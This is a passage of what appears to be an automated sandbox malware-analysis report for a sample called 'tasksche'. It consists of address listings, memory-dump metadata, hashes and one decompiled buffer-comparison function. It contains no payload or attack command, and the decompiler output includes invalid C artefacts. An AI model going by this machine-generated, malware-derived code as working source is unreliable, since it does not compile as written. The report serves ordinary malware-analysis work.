                                                                                              0x0041bbad
                                                                                              0x0041bbb5
                                                                                              0x0041bbb7
                                                                                              0x0041bbce
                                                                                              0x0041bbd6
                                                                                              0x0041bbd8
                                                                                              0x0041bbef
                                                                                              0x0041bbf7
                                                                                              0x0041bbf9
                                                                                              0x0041bc06
                                                                                              0x0041bc06
                                                                                              0x00000000
                                                                                              0x0041bbf9
                                                                                              0x0041bbe5
                                                                                              0x0041bbe9
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0041bbe9
                                                                                              0x0041bbc4
                                                                                              0x0041bbc8
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0041bbc8
                                                                                              0x0041bba3
                                                                                              0x0041bba7
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0041bba7
                                                                                              0x0041bb04
                                                                                              0x0041bb06
                                                                                              0x0041bb1d
                                                                                              0x0041bb25
                                                                                              0x0041bb27
                                                                                              0x0041bb3e
                                                                                              0x0041bb46
                                                                                              0x0041bb48
                                                                                              0x0041bb5f
                                                                                              0x0041bb67
                                                                                              0x0041bb69
                                                                                              0x0041bb76
                                                                                              0x0041bb76
                                                                                              0x00000000
                                                                                              0x0041bb69
                                                                                              0x0041bb55
                                                                                              0x0041bb59
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0041bb59
                                                                                              0x0041bb34
                                                                                              0x0041bb38
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0041bb38
                                                                                              0x0041bb13
                                                                                              0x0041bb17
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0041bb17
                                                                                              0x0041ba75
                                                                                              0x0041ba77
                                                                                              0x0041ba8e
                                                                                              0x0041ba96
                                                                                              0x0041ba98
                                                                                              0x0041baaf
                                                                                              0x0041bab7
                                                                                              0x0041bab9
                                                                                              0x0041bad0
                                                                                              0x0041bad8
                                                                                              0x0041bada
                                                                                              0x0041bae7
                                                                                              0x0041bae7
                                                                                              0x00000000
                                                                                              0x0041bada
                                                                                              0x0041bac6
                                                                                              0x0041baca
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0041baca
                                                                                              0x0041baa5
                                                                                              0x0041baa9
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0041baa9
                                                                                              0x0041ba84
                                                                                              0x0041ba88
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0041ba88
                                                                                              0x0041b9e6
                                                                                              0x0041b9e8
                                                                                              0x0041b9ff
                                                                                              0x0041ba07
                                                                                              0x0041ba09
                                                                                              0x0041ba20
                                                                                              0x0041ba28
                                                                                              0x0041ba2a
                                                                                              0x0041ba41
                                                                                              0x0041ba49
                                                                                              0x0041ba4b
                                                                                              0x0041ba58
                                                                                              0x0041ba58
                                                                                              0x00000000
                                                                                              0x0041ba4b
                                                                                              0x0041ba37
                                                                                              0x0041ba3b
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0041ba3b
                                                                                              0x0041ba16
                                                                                              0x0041ba1a
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0041ba1a
                                                                                              0x0041b9f5
                                                                                              0x0041b9f9
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0041b9f9
                                                                                              0x0041b957
                                                                                              0x0041b959
                                                                                              0x0041b970
                                                                                              0x0041b978
                                                                                              0x0041b97a
                                                                                              0x0041b991
                                                                                              0x0041b999
                                                                                              0x0041b99b
                                                                                              0x0041b9b2
                                                                                              0x0041b9ba
                                                                                              0x0041b9bc
                                                                                              0x0041b9c9
                                                                                              0x0041b9c9
                                                                                              0x00000000
                                                                                              0x0041b9bc
                                                                                              0x0041b9a8
                                                                                              0x0041b9ac
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0041b9ac
                                                                                              0x0041b987
                                                                                              0x0041b98b
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0041b98b
                                                                                              0x0041b966
                                                                                              0x0041b96a
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0041b8c1
                                                                                              0x0041b8c1
                                                                                              0x0041b8c4
                                                                                              0x0041b8c8
                                                                                              0x0041b8ca
                                                                                              0x0041b8e1
                                                                                              0x0041b8e1
                                                                                              0x0041b8e5
                                                                                              0x0041b8e9
                                                                                              0x0041b8eb
                                                                                              0x0041b902
                                                                                              0x0041b902
                                                                                              0x0041b906
                                                                                              0x0041b90a
                                                                                              0x0041b90c
                                                                                              0x0041b923
                                                                                              0x0041b923
                                                                                              0x0041b927
                                                                                              0x0041b92b
                                                                                              0x0041b92d
                                                                                              0x0041b933
                                                                                              0x0041b936
                                                                                              0x0041b93a
                                                                                              0x0041b93a
                                                                                              0x00000000
                                                                                              0x0041b92d
                                                                                              0x0041b912
                                                                                              0x0041b915
                                                                                              0x0041b919
                                                                                              0x0041b91d
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0041b91d
                                                                                              0x0041b8f1
                                                                                              0x0041b8f4
                                                                                              0x0041b8f8
                                                                                              0x0041b8fc
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0041b8fc
                                                                                              0x0041b8d0
                                                                                              0x0041b8d3
                                                                                              0x0041b8d7
                                                                                              0x0041b8db
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0041b8db
                                                                                              0x0041b0d2
                                                                                              0x0041b0d2
                                                                                              0x00000000

                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.765013589.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000002.764991485.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765189068.000000000042A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765219842.0000000000430000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765266728.0000000000435000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765314292.000000000044F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765323298.0000000000452000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_tasksche.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: c40bcf876c129f9393d32ca3cb7471e4bcf7a4352579634fb414d11934eaa4f2
                                                                                              • Instruction ID: 1a9104bdc18b99a6bc3a57d880f0b00b8efb4b2948f4f82757f4a36a4691901f
                                                                                              • Opcode Fuzzy Hash: c40bcf876c129f9393d32ca3cb7471e4bcf7a4352579634fb414d11934eaa4f2
                                                                                              • Instruction Fuzzy Hash: 8DD18E73D1E9B30A8735812D80682ABEE62AFD175031EC3E2DCE42F389D72B5D9195D4
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 100%
                                                                                              			E0041B4AD(void* __eax, void* __ecx) {
                                                                                              				void* _t183;
                                                                                              				signed int _t184;
                                                                                              				void* _t187;
                                                                                              				signed char _t193;
                                                                                              				signed char _t194;
                                                                                              				signed char _t195;
                                                                                              				signed char _t196;
                                                                                              				signed char _t198;
                                                                                              				signed int _t296;
                                                                                              				void* _t299;
                                                                                              				void* _t301;
                                                                                              				void* _t303;
                                                                                              				void* _t306;
                                                                                              				void* _t308;
                                                                                              				void* _t310;
                                                                                              				void* _t313;
                                                                                              				void* _t315;
                                                                                              				void* _t317;
                                                                                              				void* _t320;
                                                                                              				void* _t322;
                                                                                              				void* _t324;
                                                                                              				void* _t327;
                                                                                              				void* _t329;
                                                                                              				void* _t331;
                                                                                              				void* _t334;
                                                                                              				void* _t336;
                                                                                              				void* _t338;
                                                                                              
                                                                                              				_t187 = __ecx;
                                                                                              				_t183 = __eax;
                                                                                              				if( *((intOrPtr*)(__eax - 0x1d)) ==  *((intOrPtr*)(__ecx - 0x1d))) {
                                                                                              					_t296 = 0;
                                                                                              					L12:
                                                                                              					if(_t296 != 0) {
                                                                                              						goto L1;
                                                                                              					}
                                                                                              					_t193 =  *(_t183 - 0x19);
                                                                                              					if(_t193 ==  *(_t187 - 0x19)) {
                                                                                              						_t296 = 0;
                                                                                              						L23:
                                                                                              						if(_t296 != 0) {
                                                                                              							goto L1;
                                                                                              						}
                                                                                              						_t194 =  *(_t183 - 0x15);
                                                                                              						if(_t194 ==  *(_t187 - 0x15)) {
                                                                                              							_t296 = 0;
                                                                                              							L34:
                                                                                              							if(_t296 != 0) {
                                                                                              								goto L1;
                                                                                              							}
                                                                                              							_t195 =  *(_t183 - 0x11);
                                                                                              							if(_t195 ==  *(_t187 - 0x11)) {
                                                                                              								_t296 = 0;
                                                                                              								L45:
                                                                                              								if(_t296 != 0) {
                                                                                              									goto L1;
                                                                                              								}
                                                                                              								_t196 =  *(_t183 - 0xd);
                                                                                              								if(_t196 ==  *(_t187 - 0xd)) {
                                                                                              									_t296 = 0;
                                                                                              									L56:
                                                                                              									if(_t296 != 0) {
                                                                                              										goto L1;
                                                                                              									}
                                                                                              									if( *(_t183 - 9) ==  *(_t187 - 9)) {
                                                                                              										_t296 = 0;
                                                                                              										L67:
                                                                                              										if(_t296 != 0) {
                                                                                              											goto L1;
                                                                                              										}
                                                                                              										_t198 =  *(_t183 - 5);
                                                                                              										if(_t198 ==  *(_t187 - 5)) {
                                                                                              											_t296 = 0;
                                                                                              											L78:
                                                                                              											if(_t296 != 0) {
                                                                                              												goto L1;
                                                                                              											}
                                                                                              											_t184 = ( *(_t183 - 1) & 0x000000ff) - ( *(_t187 - 1) & 0x000000ff);
                                                                                              											if(_t184 != 0) {
                                                                                              												_t184 = (0 | _t184 > 0x00000000) + (0 | _t184 > 0x00000000) - 1;
                                                                                              											}
                                                                                              											L2:
                                                                                              											return _t184;
                                                                                              										}
                                                                                              										_t299 = (_t198 & 0x000000ff) - ( *(_t187 - 5) & 0x000000ff);
                                                                                              										if(_t299 == 0) {
                                                                                              											L71:
                                                                                              											_t301 = ( *(_t183 - 4) & 0x000000ff) - ( *(_t187 - 4) & 0x000000ff);
                                                                                              											if(_t301 == 0) {
                                                                                              												L73:
                                                                                              												_t303 = ( *(_t183 - 3) & 0x000000ff) - ( *(_t187 - 3) & 0x000000ff);
                                                                                              												if(_t303 == 0) {
                                                                                              													L75:
                                                                                              													_t296 = ( *(_t183 - 2) & 0x000000ff) - ( *(_t187 - 2) & 0x000000ff);
                                                                                              													if(_t296 != 0) {
                                                                                              														_t296 = (0 | _t296 > 0x00000000) + (0 | _t296 > 0x00000000) - 1;
                                                                                              													}
                                                                                              													goto L78;
                                                                                              												}
                                                                                              												_t296 = (0 | _t303 > 0x00000000) + (0 | _t303 > 0x00000000) - 1;
                                                                                              												if(_t296 != 0) {
                                                                                              													goto L1;
                                                                                              												}
                                                                                              												goto L75;
                                                                                              											}
                                                                                              											_t296 = (0 | _t301 > 0x00000000) + (0 | _t301 > 0x00000000) - 1;
                                                                                              											if(_t296 != 0) {
                                                                                              												goto L1;
                                                                                              											}
                                                                                              											goto L73;
                                                                                              										}
                                                                                              										_t296 = (0 | _t299 > 0x00000000) + (0 | _t299 > 0x00000000) - 1;
                                                                                              										if(_t296 != 0) {
                                                                                              											goto L1;
                                                                                              										}
                                                                                              										goto L71;
                                                                                              									}
                                                                                              									_t306 = ( *(_t183 - 9) & 0x000000ff) - ( *(_t187 - 9) & 0x000000ff);
                                                                                              									if(_t306 == 0) {
                                                                                              										L60:
                                                                                              										_t308 = ( *(_t183 - 8) & 0x000000ff) - ( *(_t187 - 8) & 0x000000ff);
                                                                                              										if(_t308 == 0) {
                                                                                              											L62:
                                                                                              											_t310 = ( *(_t183 - 7) & 0x000000ff) - ( *(_t187 - 7) & 0x000000ff);
                                                                                              											if(_t310 == 0) {
                                                                                              												L64:
                                                                                              												_t296 = ( *(_t183 - 6) & 0x000000ff) - ( *(_t187 - 6) & 0x000000ff);
                                                                                              												if(_t296 != 0) {
                                                                                              													_t296 = (0 | _t296 > 0x00000000) + (0 | _t296 > 0x00000000) - 1;
                                                                                              												}
                                                                                              												goto L67;
                                                                                              											}
                                                                                              											_t296 = (0 | _t310 > 0x00000000) + (0 | _t310 > 0x00000000) - 1;
                                                                                              											if(_t296 != 0) {
                                                                                              												goto L1;
                                                                                              											}
                                                                                              											goto L64;
                                                                                              										}
                                                                                              										_t296 = (0 | _t308 > 0x00000000) + (0 | _t308 > 0x00000000) - 1;
                                                                                              										if(_t296 != 0) {
                                                                                              											goto L1;
                                                                                              										}
                                                                                              										goto L62;
                                                                                              									}
                                                                                              									_t296 = (0 | _t306 > 0x00000000) + (0 | _t306 > 0x00000000) - 1;
                                                                                              									if(_t296 != 0) {
                                                                                              										goto L1;
                                                                                              									}
                                                                                              									goto L60;
                                                                                              								}
                                                                                              								_t313 = (_t196 & 0x000000ff) - ( *(_t187 - 0xd) & 0x000000ff);
                                                                                              								if(_t313 == 0) {
                                                                                              									L49:
                                                                                              									_t315 = ( *(_t183 - 0xc) & 0x000000ff) - ( *(_t187 - 0xc) & 0x000000ff);
                                                                                              									if(_t315 == 0) {
                                                                                              										L51:
                                                                                              										_t317 = ( *(_t183 - 0xb) & 0x000000ff) - ( *(_t187 - 0xb) & 0x000000ff);
                                                                                              										if(_t317 == 0) {
                                                                                              											L53:
                                                                                              											_t296 = ( *(_t183 - 0xa) & 0x000000ff) - ( *(_t187 - 0xa) & 0x000000ff);
                                                                                              											if(_t296 != 0) {
                                                                                              												_t296 = (0 | _t296 > 0x00000000) + (0 | _t296 > 0x00000000) - 1;
                                                                                              											}
                                                                                              											goto L56;
                                                                                              										}
                                                                                              										_t296 = (0 | _t317 > 0x00000000) + (0 | _t317 > 0x00000000) - 1;
                                                                                              										if(_t296 != 0) {
                                                                                              											goto L1;
                                                                                              										}
                                                                                              										goto L53;
                                                                                              									}
                                                                                              									_t296 = (0 | _t315 > 0x00000000) + (0 | _t315 > 0x00000000) - 1;
                                                                                              									if(_t296 != 0) {
                                                                                              										goto L1;
                                                                                              									}
                                                                                              									goto L51;
                                                                                              								}
                                                                                              								_t296 = (0 | _t313 > 0x00000000) + (0 | _t313 > 0x00000000) - 1;
                                                                                              								if(_t296 != 0) {
                                                                                              									goto L1;
                                                                                              								}
                                                                                              								goto L49;
                                                                                              							}
                                                                                              							_t320 = (_t195 & 0x000000ff) - ( *(_t187 - 0x11) & 0x000000ff);
                                                                                              							if(_t320 == 0) {
                                                                                              								L38:
                                                                                              								_t322 = ( *(_t183 - 0x10) & 0x000000ff) - ( *(_t187 - 0x10) & 0x000000ff);
                                                                                              								if(_t322 == 0) {
                                                                                              									L40:
                                                                                              									_t324 = ( *(_t183 - 0xf) & 0x000000ff) - ( *(_t187 - 0xf) & 0x000000ff);
                                                                                              									if(_t324 == 0) {
                                                                                              										L42:
                                                                                              										_t296 = ( *(_t183 - 0xe) & 0x000000ff) - ( *(_t187 - 0xe) & 0x000000ff);
                                                                                              										if(_t296 != 0) {
                                                                                              											_t296 = (0 | _t296 > 0x00000000) + (0 | _t296 > 0x00000000) - 1;
                                                                                              										}
                                                                                              										goto L45;
                                                                                              									}
                                                                                              									_t296 = (0 | _t324 > 0x00000000) + (0 | _t324 > 0x00000000) - 1;
                                                                                              									if(_t296 != 0) {
                                                                                              										goto L1;
                                                                                              									}
                                                                                              									goto L42;
                                                                                              								}
                                                                                              								_t296 = (0 | _t322 > 0x00000000) + (0 | _t322 > 0x00000000) - 1;
                                                                                              								if(_t296 != 0) {
                                                                                              									goto L1;
                                                                                              								}
                                                                                              								goto L40;
                                                                                              							}
                                                                                              							_t296 = (0 | _t320 > 0x00000000) + (0 | _t320 > 0x00000000) - 1;
                                                                                              							if(_t296 != 0) {
                                                                                              								goto L1;
                                                                                              							}
                                                                                              							goto L38;
                                                                                              						}
                                                                                              						_t327 = (_t194 & 0x000000ff) - ( *(_t187 - 0x15) & 0x000000ff);
                                                                                              						if(_t327 == 0) {
                                                                                              							L27:
                                                                                              							_t329 = ( *(_t183 - 0x14) & 0x000000ff) - ( *(_t187 - 0x14) & 0x000000ff);
                                                                                              							if(_t329 == 0) {
                                                                                              								L29:
                                                                                              								_t331 = ( *(_t183 - 0x13) & 0x000000ff) - ( *(_t187 - 0x13) & 0x000000ff);
                                                                                              								if(_t331 == 0) {
                                                                                              									L31:
                                                                                              									_t296 = ( *(_t183 - 0x12) & 0x000000ff) - ( *(_t187 - 0x12) & 0x000000ff);
                                                                                              									if(_t296 != 0) {
                                                                                              										_t296 = (0 | _t296 > 0x00000000) + (0 | _t296 > 0x00000000) - 1;
                                                                                              									}
                                                                                              									goto L34;
                                                                                              								}
                                                                                              								_t296 = (0 | _t331 > 0x00000000) + (0 | _t331 > 0x00000000) - 1;
                                                                                              								if(_t296 != 0) {
                                                                                              									goto L1;
                                                                                              								}
                                                                                              								goto L31;
                                                                                              							}
                                                                                              							_t296 = (0 | _t329 > 0x00000000) + (0 | _t329 > 0x00000000) - 1;
                                                                                              							if(_t296 != 0) {
                                                                                              								goto L1;
                                                                                              							}
                                                                                              							goto L29;
                                                                                              						}
                                                                                              						_t296 = (0 | _t327 > 0x00000000) + (0 | _t327 > 0x00000000) - 1;
                                                                                              						if(_t296 != 0) {
                                                                                              							goto L1;
                                                                                              						}
                                                                                              						goto L27;
                                                                                              					}
                                                                                              					_t334 = (_t193 & 0x000000ff) - ( *(_t187 - 0x19) & 0x000000ff);
                                                                                              					if(_t334 == 0) {
                                                                                              						L16:
                                                                                              						_t336 = ( *(_t183 - 0x18) & 0x000000ff) - ( *(_t187 - 0x18) & 0x000000ff);
                                                                                              						if(_t336 == 0) {
                                                                                              							L18:
                                                                                              							_t338 = ( *(_t183 - 0x17) & 0x000000ff) - ( *(_t187 - 0x17) & 0x000000ff);
                                                                                              							if(_t338 == 0) {
                                                                                              								L20:
                                                                                              								_t296 = ( *(_t183 - 0x16) & 0x000000ff) - ( *(_t187 - 0x16) & 0x000000ff);
                                                                                              								if(_t296 != 0) {
                                                                                              									_t296 = (0 | _t296 > 0x00000000) + (0 | _t296 > 0x00000000) - 1;
                                                                                              								}
                                                                                              								goto L23;
                                                                                              							}
                                                                                              							_t296 = (0 | _t338 > 0x00000000) + (0 | _t338 > 0x00000000) - 1;
                                                                                              							if(_t296 != 0) {
                                                                                              								goto L1;
                                                                                              							}
                                                                                              							goto L20;
                                                                                              						}
                                                                                              						_t296 = (0 | _t336 > 0x00000000) + (0 | _t336 > 0x00000000) - 1;
                                                                                              						if(_t296 != 0) {
                                                                                              							goto L1;
                                                                                              						}
                                                                                              						goto L18;
                                                                                              					}
                                                                                              					_t296 = (0 | _t334 > 0x00000000) + (0 | _t334 > 0x00000000) - 1;
                                                                                              					if(_t296 != 0) {
                                                                                              						goto L1;
                                                                                              					}
                                                                                              					goto L16;
                                                                                              				} else {
                                                                                              					__esi = __dl & 0x000000ff;
                                                                                              					__edx =  *(__ecx - 0x1d) & 0x000000ff;
                                                                                              					__esi = (__dl & 0x000000ff) - ( *(__ecx - 0x1d) & 0x000000ff);
                                                                                              					if(__esi == 0) {
                                                                                              						L5:
                                                                                              						__esi =  *(__eax - 0x1c) & 0x000000ff;
                                                                                              						__edx =  *(__ecx - 0x1c) & 0x000000ff;
                                                                                              						__esi = ( *(__eax - 0x1c) & 0x000000ff) - ( *(__ecx - 0x1c) & 0x000000ff);
                                                                                              						if(__esi == 0) {
                                                                                              							L7:
                                                                                              							__esi =  *(__eax - 0x1b) & 0x000000ff;
                                                                                              							__edx =  *(__ecx - 0x1b) & 0x000000ff;
                                                                                              							__esi = ( *(__eax - 0x1b) & 0x000000ff) - ( *(__ecx - 0x1b) & 0x000000ff);
                                                                                              							if(__esi == 0) {
                                                                                              								L9:
                                                                                              								__esi =  *(__eax - 0x1a) & 0x000000ff;
                                                                                              								__edx =  *(__ecx - 0x1a) & 0x000000ff;
                                                                                              								__esi = ( *(__eax - 0x1a) & 0x000000ff) - ( *(__ecx - 0x1a) & 0x000000ff);
                                                                                              								if(__esi != 0) {
                                                                                              									0 = 0 | __esi > 0x00000000;
                                                                                              									__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                              									__esi = (__esi > 0) + (__esi > 0) - 1;
                                                                                              								}
                                                                                              								goto L12;
                                                                                              							}
                                                                                              							0 = 0 | __esi > 0x00000000;
                                                                                              							__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                              							__esi = __edx;
                                                                                              							if(__edx != 0) {
                                                                                              								goto L1;
                                                                                              							}
                                                                                              							goto L9;
                                                                                              						}
                                                                                              						0 = 0 | __esi > 0x00000000;
                                                                                              						__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                              						__esi = __edx;
                                                                                              						if(__edx != 0) {
                                                                                              							goto L1;
                                                                                              						}
                                                                                              						goto L7;
                                                                                              					}
                                                                                              					0 = 0 | __esi > 0x00000000;
                                                                                              					__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                              					__esi = __edx;
                                                                                              					if(__edx != 0) {
                                                                                              						goto L1;
                                                                                              					}
                                                                                              					goto L5;
                                                                                              				}
                                                                                              				L1:
                                                                                              				_t184 = _t296;
                                                                                              				goto L2;
                                                                                              			}






























                                                                                              0x0041b4ad
                                                                                              0x0041b4ad
                                                                                              0x0041b4b3
                                                                                              0x0041b532
                                                                                              0x0041b534
                                                                                              0x0041b536
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0041b53c
                                                                                              0x0041b542
                                                                                              0x0041b5c1
                                                                                              0x0041b5c3
                                                                                              0x0041b5c5
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0041b5cb
                                                                                              0x0041b5d1
                                                                                              0x0041b650
                                                                                              0x0041b652
                                                                                              0x0041b654
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0041b65a
                                                                                              0x0041b660
                                                                                              0x0041b6df
                                                                                              0x0041b6e1
                                                                                              0x0041b6e3
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0041b6e9
                                                                                              0x0041b6ef
                                                                                              0x0041b76e
                                                                                              0x0041b770
                                                                                              0x0041b772
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0041b77e
                                                                                              0x0041b7fe
                                                                                              0x0041b800
                                                                                              0x0041b802
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0041b808
                                                                                              0x0041b80e
                                                                                              0x0041b88d
                                                                                              0x0041b88f
                                                                                              0x0041b891
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0041b89f
                                                                                              0x0041b8a1
                                                                                              0x0041b8b2
                                                                                              0x0041b8b2
                                                                                              0x0041b4a7
                                                                                              0x0041c203
                                                                                              0x0041c203
                                                                                              0x0041b817
                                                                                              0x0041b819
                                                                                              0x0041b830
                                                                                              0x0041b838
                                                                                              0x0041b83a
                                                                                              0x0041b851
                                                                                              0x0041b859
                                                                                              0x0041b85b
                                                                                              0x0041b872
                                                                                              0x0041b87a
                                                                                              0x0041b87c
                                                                                              0x0041b889
                                                                                              0x0041b889
                                                                                              0x00000000
                                                                                              0x0041b87c
                                                                                              0x0041b868
                                                                                              0x0041b86c
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0041b86c
                                                                                              0x0041b847
                                                                                              0x0041b84b
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0041b84b
                                                                                              0x0041b826
                                                                                              0x0041b82a
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0041b82a
                                                                                              0x0041b788
                                                                                              0x0041b78a
                                                                                              0x0041b7a1
                                                                                              0x0041b7a9
                                                                                              0x0041b7ab
                                                                                              0x0041b7c2
                                                                                              0x0041b7ca
                                                                                              0x0041b7cc
                                                                                              0x0041b7e3
                                                                                              0x0041b7eb
                                                                                              0x0041b7ed
                                                                                              0x0041b7fa
                                                                                              0x0041b7fa
                                                                                              0x00000000
                                                                                              0x0041b7ed
                                                                                              0x0041b7d9
                                                                                              0x0041b7dd
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0041b7dd
                                                                                              0x0041b7b8
                                                                                              0x0041b7bc
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0041b7bc
                                                                                              0x0041b797
                                                                                              0x0041b79b
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0041b79b
                                                                                              0x0041b6f8
                                                                                              0x0041b6fa
                                                                                              0x0041b711
                                                                                              0x0041b719
                                                                                              0x0041b71b
                                                                                              0x0041b732
                                                                                              0x0041b73a
                                                                                              0x0041b73c
                                                                                              0x0041b753
                                                                                              0x0041b75b
                                                                                              0x0041b75d
                                                                                              0x0041b76a
                                                                                              0x0041b76a
                                                                                              0x00000000
                                                                                              0x0041b75d
                                                                                              0x0041b749
                                                                                              0x0041b74d
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0041b74d
                                                                                              0x0041b728
                                                                                              0x0041b72c
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0041b72c
                                                                                              0x0041b707
                                                                                              0x0041b70b
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0041b70b
                                                                                              0x0041b669
                                                                                              0x0041b66b
                                                                                              0x0041b682
                                                                                              0x0041b68a
                                                                                              0x0041b68c
                                                                                              0x0041b6a3
                                                                                              0x0041b6ab
                                                                                              0x0041b6ad
                                                                                              0x0041b6c4
                                                                                              0x0041b6cc
                                                                                              0x0041b6ce
                                                                                              0x0041b6db
                                                                                              0x0041b6db
                                                                                              0x00000000
                                                                                              0x0041b6ce
                                                                                              0x0041b6ba
                                                                                              0x0041b6be
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0041b6be
                                                                                              0x0041b699
                                                                                              0x0041b69d
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0041b69d
                                                                                              0x0041b678
                                                                                              0x0041b67c
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0041b67c
                                                                                              0x0041b5da
                                                                                              0x0041b5dc
                                                                                              0x0041b5f3
                                                                                              0x0041b5fb
                                                                                              0x0041b5fd
                                                                                              0x0041b614
                                                                                              0x0041b61c
                                                                                              0x0041b61e
                                                                                              0x0041b635
                                                                                              0x0041b63d
                                                                                              0x0041b63f
                                                                                              0x0041b64c
                                                                                              0x0041b64c
                                                                                              0x00000000
                                                                                              0x0041b63f
                                                                                              0x0041b62b
                                                                                              0x0041b62f
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0041b62f
                                                                                              0x0041b60a
                                                                                              0x0041b60e
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0041b60e
                                                                                              0x0041b5e9
                                                                                              0x0041b5ed
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0041b5ed
                                                                                              0x0041b54b
                                                                                              0x0041b54d
                                                                                              0x0041b564
                                                                                              0x0041b56c
                                                                                              0x0041b56e
                                                                                              0x0041b585
                                                                                              0x0041b58d
                                                                                              0x0041b58f
                                                                                              0x0041b5a6
                                                                                              0x0041b5ae
                                                                                              0x0041b5b0
                                                                                              0x0041b5bd
                                                                                              0x0041b5bd
                                                                                              0x00000000
                                                                                              0x0041b5b0
                                                                                              0x0041b59c
                                                                                              0x0041b5a0
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0041b5a0
                                                                                              0x0041b57b
                                                                                              0x0041b57f
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0041b57f
                                                                                              0x0041b55a
                                                                                              0x0041b55e
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0041b4b5
                                                                                              0x0041b4b5
                                                                                              0x0041b4b8
                                                                                              0x0041b4bc
                                                                                              0x0041b4be
                                                                                              0x0041b4d5
                                                                                              0x0041b4d5
                                                                                              0x0041b4d9
                                                                                              0x0041b4dd
                                                                                              0x0041b4df
                                                                                              0x0041b4f6
                                                                                              0x0041b4f6
                                                                                              0x0041b4fa
                                                                                              0x0041b4fe
                                                                                              0x0041b500
                                                                                              0x0041b517
                                                                                              0x0041b517
                                                                                              0x0041b51b
                                                                                              0x0041b51f
                                                                                              0x0041b521
                                                                                              0x0041b527
                                                                                              0x0041b52a
                                                                                              0x0041b52e
                                                                                              0x0041b52e
                                                                                              0x00000000
                                                                                              0x0041b521
                                                                                              0x0041b506
                                                                                              0x0041b509
                                                                                              0x0041b50d
                                                                                              0x0041b511
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0041b511
                                                                                              0x0041b4e5
                                                                                              0x0041b4e8
                                                                                              0x0041b4ec
                                                                                              0x0041b4f0
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0041b4f0
                                                                                              0x0041b4c4
                                                                                              0x0041b4c7
